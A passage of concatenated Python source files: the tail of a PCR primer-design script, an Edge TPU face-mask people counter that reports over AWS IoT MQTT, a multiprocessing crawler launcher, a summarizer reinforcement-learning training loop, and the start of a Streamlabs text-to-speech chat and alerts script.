dict( common + [("PRIMER_MIN_TM",63), ("PRIMER_MAX_TM",66), ("PRIMER_OPT_TM",63), ("PRIMER_SALT_DIVALENT",2.5), ("PRIMER_DNTP_CONC",0.8)] ),
dict( common + [("PRIMER_MIN_TM",54), ("PRIMER_MAX_TM",57), ("PRIMER_OPT_TM",57), ("PRIMER_SALT_DIVALENT",2.5), ("PRIMER_DNTP_CONC",0.8)] ),
dict( common + [("PRIMER_MIN_TM",66), ("PRIMER_MAX_TM",69), ("PRIMER_OPT_TM",66), ("PRIMER_SALT_DIVALENT",2.5), ("PRIMER_DNTP_CONC",0.8)] ),
dict( common + [("PRIMER_MIN_TM",51), ("PRIMER_MAX_TM",54), ("PRIMER_OPT_TM",54), ("PRIMER_SALT_DIVALENT",2.5), ("PRIMER_DNTP_CONC",0.8)] ) ]
return param_sets[0:num_ranges]
if (__name__ == "__main__"):
fwd_tag, rev_tag, target_isoform_IDs, genome_ref, transcriptome_ref, input_gtf, all_parts_bed, all_exonic_parts_tbl, output_file, output_gtf = sys.argv[1:]
target_isoforms = readTargetIsoformMRNAs(target_isoform_IDs, transcriptome_ref) # target_isoform_mRNAs
isoforms_per_gene, all_target_loci_isoforms, isoformOID = associateIsoformsToTargetGenesPlusOldID(input_gtf, target_isoforms)
isoform_parts_list = buildTargetIsoformPartsList(all_parts_bed, all_target_loci_isoforms)
annotateAndOrderTargetIsoformParts(all_exonic_parts_tbl, isoform_parts_list, all_target_loci_isoforms, True)
target_isoform_signature_with_primer_pair = designPrimers(target_isoforms, isoforms_per_gene, isoform_parts_list, genome_ref, transcriptome_ref, fwd_tag, rev_tag)
#cPickle.dump(target_isoform_signature_with_primer_pair, open("signature_primers.pkl","wb"))
#target_isoform_signature_with_primer_pair = cPickle.load(open("signature_primers.pkl","rb"))
evalPrimerPool(target_isoform_signature_with_primer_pair)
writeSignatures(target_isoform_signature_with_primer_pair, isoformOID, output_file, output_gtf)
sys.exit(0)
|
face-mask-iot.py
|
from utils.centroidtracker import CentroidTracker
from utils.trackableobject import TrackableObject
from utils.tracking import track_objects, draw_bounding_boxes
from imutils.video import VideoStream
from imutils.video import FPS
from flask import Flask, render_template, Response
from edgetpu.detection.engine import DetectionEngine
from edgetpu.utils import dataset_utils
from awscrt import io, mqtt, auth, http
from awsiot import mqtt_connection_builder
from PIL import Image
import numpy as np
import configparser
import imutils
import time
import cv2
import threading
import datetime
import os
import json
# load config file
config = configparser.ConfigParser()
config.read('vol/config.ini')
# get config file values
model = config['DETECTION']['model']
labels = config['DETECTION']['labels']
orientation = config['COUNTER']['orientation']
inDirection = config['COUNTER']['inDirection']
confidence = float(config['DETECTION']['confidence'])
coord = int(config['COUNTER']['coord'])
endpoint = config['IOT-DEVICE']['endpoint']
client_id = config['IOT-DEVICE']['client_id']
path_to_cert = config['IOT-DEVICE']['path_to_cert']
path_to_key = config['IOT-DEVICE']['path_to_key']
path_to_root = config['IOT-DEVICE']['path_to_root']
my_topic = config['IOT-DEVICE']['topic']
# Spin up resources
event_loop_group = io.EventLoopGroup(1)
host_resolver = io.DefaultHostResolver(event_loop_group)
client_bootstrap = io.ClientBootstrap(event_loop_group, host_resolver)
mqtt_connection = mqtt_connection_builder.mtls_from_path(
endpoint=endpoint,
cert_filepath=path_to_cert,
pri_key_filepath=path_to_key,
client_bootstrap=client_bootstrap,
ca_filepath=path_to_root,
client_id=client_id,
clean_session=False,
keep_alive_secs=6
)
# Make the connect() call
connect_future = mqtt_connection.connect()
# Future.result() waits until a result is available
connect_future.result()
lock = threading.Lock()
engine = DetectionEngine(model)
labels = dataset_utils.read_label_file(labels)
ct1 = CentroidTracker(maxDisappeared=600, maxDistance=900)
ct2 = CentroidTracker(maxDisappeared=600, maxDistance=900)
app = Flask(__name__)
print(config.has_option("APP", "input"))
if config['APP']['input'] == "webcam":
print("[INFO] starting video stream...")
vs = VideoStream(src=0).start()
time.sleep(2.0)
vidcap = False
else:
print("[INFO] opening network camera or video file...")
vidcap = True
vs = cv2.VideoCapture(config['APP']['input'])
# start the frames per second throughput estimator
fps = FPS().start()
@app.route("/")
def index():
return render_template("index.html")
def detect_objects():
global cap, outputFrame, lock
# initialize the total number of frames processed thus far, along
# with the total number of objects that have moved either up or down
totalFrames = 0
# individial count to be sent across MQTT
count_unmasked = []
count_masked = []
# list to display totals locally
totals_unmasked = [0, 0]
totals_masked = [0, 0]
trackableObjects_unmasked = {}
trackableObjects_masked = {}
(H, W) = (None, None)
while True:
# grab the next frame and handle if we are reading from either
# VideoCapture or VideoStream
frame = vs.read()
if vidcap:
frame = frame[1]
else:
frame
frame = imutils.resize(frame, width=480)
rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
prepimg = Image.fromarray(rgb)
ans = engine.detect_with_image(
prepimg,
threshold=confidence,
keep_aspect_ratio=True,
relative_coord=False,
top_k=20)
# if the frame dimensions are empty, set them
if W is None or H is None:
(H, W) = frame.shape[:2]
if orientation == "V":
line_pt1 = (coord, 0)
line_pt2 = (coord, H)
elif orientation == "H":
line_pt1 = (0, coord)
line_pt2 = (W, coord)
# Draw dividing line
cv2.line(frame, (line_pt1), (line_pt2), (0, 255, 255), 2)
# initialise variables
rects_unmasked = []
rects_masked = []
payload = {}
payload['deviceID'] = client_id
# loop through detections
if ans:
for obj in ans:
if obj.label_id == 0:
rects_unmasked, frame = draw_bounding_boxes(
obj, labels, frame, rects_unmasked)
elif obj.label_id == 1:
rects_masked, frame = draw_bounding_boxes(
obj, labels, frame, rects_masked)
objects_unmasked = ct1.update(rects_unmasked)
objects_masked = ct2.update(rects_masked)
trackableObjects_unmasked, count_unmasked = track_objects(
objects_unmasked, trackableObjects_unmasked, orientation, coord, inDirection)
trackableObjects_masked, count_masked = track_objects(
objects_masked, trackableObjects_masked, orientation, coord, inDirection)
if count_unmasked[0]:
payload['maskState'] = "Unmasked"
payload['personDirection'] = "In"
payload['dateTime'] = datetime.datetime.now().strftime(
"%Y-%m-%d %H:%M:%S")
mqtt_connection.publish(topic=my_topic, payload=json.dumps(
payload), qos=mqtt.QoS.AT_LEAST_ONCE)
totals_unmasked[0] += count_unmasked[0]
if count_unmasked[1]:
payload['maskState'] = "Unmasked"
payload['personDirection'] = "Out"
payload['dateTime'] = datetime.datetime.now().strftime(
"%Y-%m-%d %H:%M:%S")
mqtt_connection.publish(topic=my_topic, payload=json.dumps(
payload), qos=mqtt.QoS.AT_LEAST_ONCE)
totals_unmasked[1] += count_unmasked[1]
if count_masked[0]:
payload['maskState'] = "Masked"
payload['personDirection'] = "In"
payload['dateTime'] = datetime.datetime.now().strftime(
"%Y-%m-%d %H:%M:%S")
mqtt_connection.publish(topic=my_topic, payload=json.dumps(
payload), qos=mqtt.QoS.AT_LEAST_ONCE)
totals_masked[0] += count_masked[0]
if count_masked[1]:
payload['maskState'] = "Masked"
payload['personDirection'] = "Out"
payload['dateTime'] = datetime.datetime.now().strftime(
"%Y-%m-%d %H:%M:%S")
mqtt_connection.publish(topic=my_topic, payload=json.dumps(
payload), qos=mqtt.QoS.AT_LEAST_ONCE)
totals_masked[1] += count_masked[1]
# Build screen text output
text_masked = "IN: {} OUT: {}".format(
totals_masked[0], totals_masked[1])
cv2.putText(frame, text_masked, (W-120, 20),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)
text_unmasked = "IN: {} OUT: {}".format(
totals_unmasked[0], totals_unmasked[1])
cv2.putText(frame, text_unmasked, (W-120, 40),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)
# grab the current timestamp and draw it on the frame
timestamp = datetime.datetime.now()
cv2.putText(frame, timestamp.strftime("%d/%m/%y %H:%M:%S"), (W-120, H - 25),
cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 0), 2)
# increment the total number of frames processed thus far and
# then update the FPS counter
totalFrames += 1
fps.update()
# stop the timer and display FPS information
fps.stop()
# print("[INFO] elapsed time: {:.2f}".format(fps.elapsed()))
# print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))
with lock:
outputFrame = cv2.resize(frame, (640, 480))
def generate():
global outputFrame, lock
while True:
with lock:
if outputFrame is None:
continue
(flag, encodedImage) = cv2.imencode(".jpg", outputFrame)
if not flag:
continue
yield(b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' +
bytearray(encodedImage) + b'\r\n')
@ app.route("/video_feed")
def video_feed():
return Response(generate(),
mimetype="multipart/x-mixed-replace; boundary=frame")
if __name__ == '__main__':
t = threading.Thread(target=detect_objects)
t.daemon = True
t.start()
app.run(host=config['APP']['host'], port=config['APP']['port'], debug=True,
threaded=True, use_reloader=False)
disconnect_future = mqtt_connection.disconnect()
disconnect_future.result()
vs.stop()
cv2.destroyAllWindows()
|
process_crawler.py
|
# -*- encoding:utf8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import multiprocessing
from threaded_crawler import threaded_crawler
def process_crawler(args, **kwargs):
num_cpus = multiprocessing.cpu_count()
print 'Starting {} processes'.format(num_cpus-1)
processes = []
for i in range(num_cpus):
p = multiprocessing.Process(target=threaded_crawler, args=[args], kwargs=kwargs)
p.start()
processes.append(p)
for p in processes:
p.join()
|
train_summary_loop_add_faith.py
|
from torch.utils.data import DataLoader, RandomSampler
import torch, os, sys, time, argparse, numpy as np
from utils_dataset import SQLDataset, HDF5Dataset
from transformers.optimization import AdamW
from model_generator import GeneTransformer
from datetime import datetime, timedelta
from utils_logplot import LogPlot
import utils_misc, utils_tokenizer
from model_faith import FEQA
from model_coverage import KeywordCoverage
from model_guardrails import PatternPenalty, LengthPenalty, RepeatPenalty
import threading, queue
user = os.getlogin()
parser = argparse.ArgumentParser()
parser.add_argument("--experiment", type=str, required=True, help="Experiment name. Will be used to save a model file and a log file.")
parser.add_argument("--dataset_file", type=str, required=True, help="Which dataset file to use. Can be full path or the root folder will be attached.")
parser.add_argument("--root_folder", type=str, default="/home/"+user+"/")
parser.add_argument("--train_batch_size", type=int, default=4, help="Training batch size.")
parser.add_argument("--n_epochs", type=int, default=3, help="Number of epochs to run over the data.")
parser.add_argument("--optim_every", type=int, default=4, help="Optimize every x backprops. A multiplier to the true batch size.")
parser.add_argument("--max_output_length", type=int, default=25, help="Maximum output length. Saves time if the sequences are short.")
parser.add_argument("--save_every", type=int, default=60, help="Number of seconds between any two saves.")
parser.add_argument("--device", type=str, default="cuda", help="cuda or cpu")
parser.add_argument('--fp16', action='store_true', help="Whether to use 16-bit (mixed) precision (through NVIDIA apex) instead of 32-bit")
parser.add_argument("--ckpt_every", type=int, default=600, help="If 0, checkpointing is not used. Otherwise, checkpointing is done very x seconds.")
parser.add_argument("--ckpt_lookback", type=int, default=300, help="When checkpointing, will consider the avg total score of the last x samples.")
args = parser.parse_args()
if args.device == "cuda":
freer_gpu = str(utils_misc.get_freer_gpu())
os.environ["CUDA_VISIBLE_DEVICES"] = ""+str(freer_gpu)
args.experiment += "_"+freer_gpu
models_folder = args.root_folder + "models/"
log_folder = args.root_folder + "logs/"
#summarizer_model_start = os.path.join(models_folder, "origin_models/gpt2_copier23.bin")
#summarizer_model_start = os.path.join(models_folder, "gpt2_test_cgen23.bin")
summarizer_model_start = os.path.join(models_folder, "summarizer_faith_batch2_1_ckpt.bin")
#summarizer_model_start = os.path.join(models_folder, "origin_models/summary_loop_length24.bin")
ckpt_every = args.ckpt_every
ckpt_lookback = int((args.ckpt_lookback+args.train_batch_size-1)/args.train_batch_size)
total_score_history = []
best_ckpt_score = None
ckpt_file = os.path.join(models_folder, "summarizer_"+args.experiment+"_ckpt.bin")
ckpt_optimizer_file = os.path.join(models_folder, "summarizer_optimizer_"+args.experiment+"_ckpt.bin")
learning_rate = 2e-5
n_epochs = args.n_epochs
if args.device == "cuda":
print("Training on GPU "+str(freer_gpu))
bert_tokenizer = utils_tokenizer.BERTCacheTokenizer()
print("---------------")
summarizer = GeneTransformer(max_output_length=args.max_output_length, device=args.device, tokenizer_type='gpt2', starter_model=summarizer_model_start)
print("Summarizer loaded")
def collate_func(inps):
if ".db" in args.dataset_file:
return [a['body'] for a in inps]
else:
return [inp[0].decode() for inp in inps]
param_optimizer = list(summarizer.model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
logplot_file = os.path.join(log_folder, "summary_loop_%s.log" % (args.experiment))
logplot = LogPlot(logplot_file)
optimizer = AdamW(optimizer_grouped_parameters, lr=learning_rate)
time_save = time.time()
time_ckpt = time.time()
if args.fp16:
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
summarizer.model, optimizer = amp.initialize(summarizer.model, optimizer, opt_level="O1") # For now O1. See details at https://nvidia.github.io/apex/amp.html
print("Loading scorers")
# coverage_model_file = os.path.join(models_folder, "bert_coverage_on_cnndm_train_with_newsbert_n10_0.bin") # mydepC
coverage_model_file = os.path.join(models_folder, "origin_models/bert_coverage.bin")
# coverage_keyword_model_file = os.path.join(models_folder, "keyword_extractor.joblib")
fluency_news_model_file = os.path.join(models_folder, "origin_models/fluency_news_bs32.bin")
scorers = [
{"name": "coverage", "importance": 10.0, "sign": 1.0, "model": KeywordCoverage(args.device, model_file=coverage_model_file)}, # keyword_model_file=coverage_keyword_model_file,
{"name": "fluency", "importance": 2.0, "sign": 1.0, "model": GeneTransformer(max_output_length=args.max_output_length, device=args.device, starter_model=fluency_news_model_file)},
{"name": "patpen", "importance": 5.0, "sign": -1.0, "model": PatternPenalty()},
{"name": "lengthpen", "importance": 2.0, "sign": -1.0, "model": LengthPenalty(args.max_output_length)},
{"name": "reppen", "importance": 2.0, "sign": -1.0, "model": RepeatPenalty()},
{"name": "faith", "importance": 5.0, "sign": 1.0, "model": FEQA(device=args.device)}
]
def background_tokenizer(bodies, out_queue):
out_queue.put([bert_tokenizer.encode(body) for body in bodies])
my_queue = queue.Queue()
print("Started training")
if ".db" in args.dataset_file:
all_dataset = SQLDataset(args.dataset_file)
else:
all_dataset = HDF5Dataset(args.dataset_file, collection_name="name")
dataset = all_dataset
print("Dataset size:", len(dataset))
dataloader = DataLoader(dataset=dataset, batch_size=args.train_batch_size, sampler=RandomSampler(dataset), drop_last=True, collate_fn=collate_func)
def low_summary_quality(log_obj, total_sampled_scores):
current_total_score = torch.mean(total_sampled_scores).item()
if len(log_obj) == 0 or current_total_score < 4:
return True
else:
return ( log_obj["reppen_score"] > 0 or
log_obj["patpen_score"] > 0 or
log_obj["lengthpen_score"] == 1 or
log_obj['fluency_score'] < 0.3 or
log_obj['coverage_score'] < 0.3
)
for epi in range(n_epochs):
print("=================== EPOCH",epi, "===================")
for ib, documents in enumerate(dataloader):
Timer = {}
T1 = time.time()
log_obj = {}
bodies = [" ".join(doc.split(" ")[:300]) for doc in documents if len(doc) > 0 ]
# We run tokenization in the background, as it is BERT tokenization only used after the summarizer has run. Saves about 5% of time.
thread1 = threading.Thread(target = background_tokenizer, args = (bodies, my_queue))
# bodies_bert_tokenized = [bert_tokenizer.enncode(body) for body in bodies] # This is the not background version
thread1.start()
T2 = time.time()
Timer["preprocessing_starting"] = T2-T1
# T1b = time.time()
sampled_summaries, sampled_logprobs, sampled_tokens, input_past, sampled_end_idxs = summarizer.decode_batch(bodies, max_output_length=args.max_output_length, return_logprobs=True, sample=True)
T3 = time.time()
Timer["generator_sampled"] = T3-T2
with torch.no_grad():
argmax_summaries, argmax_end_idxs = summarizer.decode_batch(bodies, max_output_length=args.max_output_length, input_past=input_past)
T4 = time.time()
Timer["generator_argmax"] = T4-T3
selected_logprobs = torch.sum(sampled_logprobs, dim=1)
batch_size, seq_length = sampled_logprobs.shape
# We join it here, saying the tokenization that's been running in the background should be done by now.
thread1.join()
bodies_bert_tokenized = my_queue.get()
scores_track = {}
total_sampled_scores = torch.FloatTensor([0.0] * batch_size).to(args.device)
total_argmax_scores = torch.FloatTensor([0.0] * batch_size).to(args.device)
for scorer in scorers:
if scorer['name'] == "faith" and low_summary_quality(log_obj, total_sampled_scores):
continue # when summary quality is low, not worth to cal faithfulness, usually 0
T = time.time()
sampled_scores, extra = scorer['model'].score(sampled_summaries, bodies, bodies_tokenized=bodies_bert_tokenized, extra=None, lengths=sampled_end_idxs)
sampled_scores = torch.FloatTensor(sampled_scores).to(args.device)
argmax_scores, _ = scorer['model'].score(argmax_summaries, bodies, bodies_tokenized=bodies_bert_tokenized, extra=extra, lengths=argmax_end_idxs)
argmax_scores = torch.FloatTensor(argmax_scores).to(args.device)
Timer["scores_"+scorer['name']] = time.time()-T
total_sampled_scores += (scorer['sign'])*(scorer['importance'])*sampled_scores
total_argmax_scores += (scorer['sign'])*(scorer['importance'])*argmax_scores
log_obj[scorer['name']+"_score"] = sampled_scores.mean().item()
scores_track[scorer['name']+"_scores"] = sampled_scores
T5 = time.time()
Timer['all_scores'] = T5-T4
Loss = torch.mean((total_argmax_scores - total_sampled_scores) * selected_logprobs)
if args.fp16:
with amp.scale_loss(Loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
Loss.backward()
T6 = time.time()
Timer['backward'] = T6-T5
if ib%args.optim_every == 0:
optimizer.step()
optimizer.zero_grad()
T7 = time.time()
Timer['optim'] = T7-T6
# log_obj['summary_nwords'] = int(np.mean([summ.count(" ")+1 for summ in sampled_summaries]))
avg_total = total_sampled_scores.mean().item()
total_score_history.append(avg_total)
log_obj['summary_nwords'] = int(np.mean(sampled_end_idxs))
log_obj['loss'] = Loss.item()
log_obj['total_score'] = avg_total
log_obj['count'] = batch_size
logplot.cache(log_obj, prefix="T_")
Tfinal = time.time()
Timer['total'] = Tfinal - T1
# print(Timer)
if (time.time()-time_save > args.save_every):
print("==========================================")
print(bodies[0])
print("-----------")
print(sampled_summaries[0])
print("-----------")
print("Total score:", total_sampled_scores[0].item())
for scorer in scorers:
if scorer['name'] == "faith" and (scorer['name']+"_scores") not in scores_track:
continue
print(scorer['name']+" score:", scores_track[scorer['name']+"_scores"][0].item())
print("-----------")
logplot.save(printing=True)
# print(Timer)
time_save = time.time()
print("==========================================")
if ckpt_every > 0 and len(total_score_history) > ckpt_lookback:
current_score = np.mean(total_score_history[-ckpt_lookback:])
if time.time()-time_ckpt > ckpt_every:
revert_ckpt = best_ckpt_score is not None and current_score < min(1.2*best_ckpt_score, 0.8*best_ckpt_score) # Could be negative or positive
print("================================== CKPT TIME, "+str(datetime.now())+" =================================")
print("Previous best:", best_ckpt_score)
print("Current Score:", current_score)
print("[CKPT] Am I reverting?", ("yes" if revert_ckpt else "no! BEST CKPT"))
if revert_ckpt:
summarizer.model.load_state_dict(torch.load(ckpt_file))
optimizer.load_state_dict(torch.load(ckpt_optimizer_file))
time_ckpt = time.time()
print("==============================================================================")
if best_ckpt_score is None or current_score > best_ckpt_score:
print("[CKPT] Saved new best at: %.3f %s" % (current_score, "["+str(datetime.now())+"]"))
best_ckpt_score = current_score
torch.save(summarizer.model.state_dict(), ckpt_file)
torch.save(optimizer.state_dict(), ckpt_optimizer_file)
|
TTSAlertsAndChat_StreamlabsSystem.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
""" Text-To-Speech for Alerts and Chat Messages
1.1.4
Fixed bug adding unicode characters to banned words list
Added setting for ban messages
Added ability to ban users for a time
1.1.3
Fixed bug where banned words showed on overlay
1.1.2
Support ascii characters in overlay
1.1.1
Control overlay position/message, ban users, and set a character limit
1.1.0
Added $tts parameter, text-to-speech overlay, fixed twitch sub
1.0.0
Initial public release
"""
#---------------------------------------
# Script Import Libraries
#---------------------------------------
import os
import codecs
import json
from collections import OrderedDict
import time
import re
import threading
import clr
clr.AddReference("IronPython.Modules.dll")
clr.AddReference('System.Speech')
clr.AddReferenceToFileAndPath(os.path.join(os.path.dirname(os.path.realpath(__file__)), "StreamlabsEventReceiver.dll"))
from System.Speech.Synthesis import SpeechSynthesizer
from StreamlabsEventReceiver import StreamlabsEventClient
#---------------------------------------
# Script Information
#---------------------------------------
ScriptName = "TTS Alerts and Chat"
Website = "https://www.twitch.tv/kruiser8"
Description = "Text-to-speech for highlight chat messages."
Creator = "Kruiser8 (Mod by Travkina)"
Version = "1.1.4"
#---------------------------------------
# Script Variables
#---------------------------------------
# Socket Receiver
EventReceiver = None
# Settings file location
SettingsFile = os.path.join(os.path.dirname(__file__), "settings.json")
# UI Config file location
UIConfigFile = os.path.join(os.path.dirname(__file__), "UI_Config.json")
# Banned user file
BannedUserFile = os.path.join(os.path.dirname(__file__), "users.txt")
# Banned word file
BannedWordFile = os.path.join(os.path.dirname(__file__), "banned.txt")
# TTS Parser
RegTTS = re.compile(r"\$tts\((?P<message>.*?)\)")
SubPlanMap = {
"Prime": "Prime",
"1000": "Tier 1",
"2000": "Tier 2",
"3000": "Tier 3"
}
#---------------------------------------
# Script Classes
#---------------------------------------
class Settings(object):
""" Load in saved settings file if available else set default values. """
def __init__(self, settingsfile=None):
try:
with codecs.open(settingsfile, encoding="utf-8-sig", mode="r") as f:
self.__dict__ = json.load(f, encoding="utf-8")
except:
self.VoiceName = ""
self.Volume = 100
self.Rate = 0
self.MaxCharacters = 0
self.MaxCharacterMessage = "{user}, your message was too long for text-to-speech."
self.TTSCommand = ""
self.TTSCommandPermission = "Everyone"
self.TTSCommandPermissionInfo = ""
self.TTSCommandCost = 0
self.TTSCommandMessage = "{user} says, {message}"
self.TTSCommandUsage = "Stream Chat"
self.TTSCommandUsageReply = False
self.TTSCommandUsageReplyMessage = "{user} you can only use this command from {usage}!"
self.TTSUseCD = False
self.TTSCasterCD = True
self.TTSCooldown = 0
self.TTSOnCooldown = "{user} the command is still on cooldown for {cooldown} seconds!"
self.TTSUserCooldown = 10
self.TTSOnUserCooldown = "{user} the command is still on user cooldown for {cooldown} seconds!"
self.TTSAllChat = True
self.TTSAllChatExcludeCommands = True
self.TTSAllChatMessage = "{user} says, {message}"
self.TTSAllChatUsage = "Stream Chat"
self.TTSAllChatUsageReply = False
self.TTSAllChatUsageReplyMessage = "{user} you can only use this command from {usage}!"
self.TTSOverlayExcludeAlerts = True
self.TTSOverlayMessage = "{user} says, {message}"
self.TTSOverlayTime = 8
self.TTSOverlayFontColor = "rgba(255,255,255,1.0)"
self.TTSOverlayUseFontOutline = False
self.TTSOverlayFontOutline = "rgba(0,0,0,0)"
self.TTSOverlayUseFontShadow = True
self.TTSOverlayFontShadow = "rgba(0,0,0,1.0)"
self.TTSOverlayFontSize = 32
self.TTSOverlayFont = ""
self.TTSOverlayUseBackground = True
self.TTSOverlayBackgroundColor = "rgba(0,0,0,1.0)"
self.TTSOverlayUseBorder = True
self.TTSOverlayBorderColor = "rgba(255,255,255,1.0)"
self.TTSOverlayHorizontalAlign = "center"
self.TTSOverlayVerticalAlign = "center"
self.TTSOverlayAnimateIn = 'fadeIn'
self.TTSOverlayAnimateOut = 'fadeOut'
self.MixerOnFollow = False
self.MixerFollowDelay = 0
self.MixerFollowMessage = "{name} has followed."
self.MixerOnHost = False
self.MixerHostMinimum = 0
self.MixerHostDelay = 0
self.MixerHostMessage = "{name} has hosted you with {amount} viewer{isPlural}."
self.MixerOnSub = False
self.MixerIncludeSubMessage = True
self.MixerSubDelay = 0
self.MixerSubMessage = "{name} has subscribed ({tier})."
self.MixerResubMessage = "{name} has resubscribed ({tier}) for {months} months."
self.StreamlabsOnDonation = False
self.StreamlabsIncludeDonationMessage = True
self.StreamlabsDonationMinimum = 1
self.StreamlabsDonationDelay = 0
self.StreamlabsDonationMessage = "{name} donated {amount}."
self.TwitchOnCheer = False
self.TwitchIncludeCheerMessage = True
self.TwitchCheerMinimum = 100
self.TwitchCheerDelay = 0
self.TwitchCheerMessage = "{name} has used {amount} bit{isPlural}."
self.TwitchOnFollow = False
self.TwitchFollowDelay = 0
self.TwitchFollowMessage = "{name} has followed."
self.TwitchOnHost = False
self.TwitchHostMinimum = 0
self.TwitchHostDelay = 0
self.TwitchHostMessage = "{name} has hosted you with {amount} viewer{isPlural}."
self.TwitchOnRaid = False
self.TwitchRaidMinimum = 0
self.TwitchRaidDelay = 0
self.TwitchRaidMessage = "{name} has raided you with a party of {amount}."
self.TwitchOnSub = False
self.TwitchIncludeSubMessage = True
self.TwitchSubDelay = 0
self.TwitchSubMessage = "{name} has subscribed ({tier})."
self.TwitchResubMessage = "{name} has resubscribed ({tier}) for {months} months."
self.TwitchGiftMessage = "{gifter} has gifted a sub ({tier}) to {name} ({months} month{isPlural})."
self.TwitchGiftMassMessage = "{gifter} has gifted {amount} subs to the channel: {recipients}."
self.YoutubeOnFollow = False
self.YoutubeFollowDelay = 0
self.YoutubeFollowMessage = "{name} has followed."
self.YoutubeOnSub = False
self.YoutubeIncludeSubMessage = True
self.YoutubeSubDelay = 0
self.YoutubeSubMessage = "{name} has subscribed ({tier})."
self.YoutubeResubMessage = "{name} has resubscribed ({tier}) for {months} months."
self.YoutubeOnSuperchat = False
self.YoutubeIncludeSuperchatMessage = True
self.YoutubeSuperchatMinimum = 5
self.YoutubeSuperchatDelay = 0
self.YoutubeSuperchatMessage = "{name} donated {amount}."
self.BanUserCommand = "!banuser"
self.BanUserCommandPermission = "Caster"
self.BanUserCommandPermissionInfo = ""
self.BanUserAddResponse = "The user was banned from using TTS."
self.BanUserResponseResponse = "The user is now able to use TTS."
self.BanWordCommand = "!banword"
self.BanWordCommandPermission = "Caster"
self.BanWordCommandPermissionInfo = ""
self.BanWordAddResponse = "The word was added to the banned words list."
self.BanWordRemoveResponse = "The word was removed from the banned words list."
self.BannedAction = "Skip Messages with Banned Words"
self.BannedActionBoolean = True
self.BannedMatchWholeWord = True
self.BannedReplacement = ""
self.SocketToken = None
def Reload(self, jsondata):
""" Reload settings from Streamlabs user interface by given json data. """
self.__dict__ = json.loads(jsondata, encoding="utf-8")
def Save(self, settingsfile):
""" Save settings contained within to .json and .js settings files. """
try:
with codecs.open(settingsfile, encoding="utf-8-sig", mode="w+") as f:
json.dump(self.__dict__, f, encoding="utf-8", ensure_ascii=False)
with codecs.open(settingsfile.replace("json", "js"), encoding="utf-8-sig", mode="w+") as f:
f.write("var settings = {0};".format(json.dumps(self.__dict__, encoding='utf-8', ensure_ascii=False)))
except:
Parent.Log(ScriptName, "Failed to save settings to file.")
class UIConfig(object):
""" Load in saved settings file if available else set default values. """
def __init__(self, uiconfigfile=None):
try:
with codecs.open(uiconfigfile, encoding="utf-8-sig", mode="r") as f:
self.__dict__ = json.load(f, encoding="utf-8", object_pairs_hook=OrderedDict)
except:
Parent.SendStreamWhisper(Parent.GetChannelName(), "Failed to read UIConfig file: " + str(sys.exc_info()[1]))
def Save(self, uiconfigfile):
""" Save UI Config contained within to .json file. """
if len(self.__dict__) > 0:
try:
with codecs.open(uiconfigfile, encoding="utf-8-sig", mode="w+") as f:
json.dump(self.__dict__, f, encoding="utf-8", ensure_ascii=False)
except:
Parent.SendStreamWhisper(Parent.GetChannelName(), "Failed to save ui config to file.")
#---------------------------------------
# Event Receiver Functions
#---------------------------------------
def EventReceiverConnected(sender, args):
Parent.Log(ScriptName, "Connected")
return
def EventReceiverDisconnected(sender, args):
Parent.Log(ScriptName, "Disconnected")
def EventReceiverEvent(sender, args):
handleEvent(sender,args)
def handleEvent(sender, args):
# Just grab the all data in from the event
evntdata = args.Data
# Check if it contains data and for what streaming service it is
if evntdata and evntdata.For == "twitch_account":
if evntdata.Type == "follow" and ScriptSettings.TwitchOnFollow:
for message in evntdata.Message:
ttsMessage = ScriptSettings.TwitchFollowMessage.format(name=message.Name)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchFollowDelay)
elif evntdata.Type == "bits" and ScriptSettings.TwitchOnCheer:
s = ''
for message in evntdata.Message:
if message.Amount >= ScriptSettings.TwitchCheerMinimum:
if message.Amount > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.TwitchCheerMessage.format(name=message.Name, amount=message.Amount, isPlural=s)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchCheerDelay, ScriptSettings.TwitchIncludeCheerMessage, message.Message, message.Name)
elif evntdata.Type == "host" and ScriptSettings.TwitchOnHost:
s = ''
for message in evntdata.Message:
if int(message.Viewers) >= ScriptSettings.TwitchHostMinimum:
if message.Viewers > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.TwitchHostMessage.format(name=message.Name, amount=str(message.Viewers), isPlural=s)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchHostDelay)
elif evntdata.Type == "raid" and ScriptSettings.TwitchOnRaid:
for message in evntdata.Message:
if int(message.Raiders) >= ScriptSettings.TwitchRaidMinimum:
ttsMessage = ScriptSettings.TwitchRaidMessage.format(name=message.Name, amount=str(message.Raiders))
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchRaidDelay)
elif evntdata.Type == "subscription" and ScriptSettings.TwitchOnSub:
try:
s = ''
if len(evntdata.Message) > 1 and evntdata.Message[0].Gifter:
names = []
for message in evntdata.Message:
names.append(message.Name)
giftees = ', '.join(names)
ttsMessage = ScriptSettings.TwitchGiftMassMessage.format(recipients=giftees, gifter=message.Gifter, amount=len(names))
else:
for message in evntdata.Message:
tier = SubPlanMap[str(message.SubPlan)]
ttsMessage = ''
if message.Gifter:
if message.Months > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.TwitchGiftMessage.format(name=message.Name, gifter=message.Gifter, tier=tier, months=message.Months, isPlural=s)
else:
if message.Months == 1:
ttsMessage = ScriptSettings.TwitchSubMessage.format(name=message.Name, tier=tier, months=message.Months)
else:
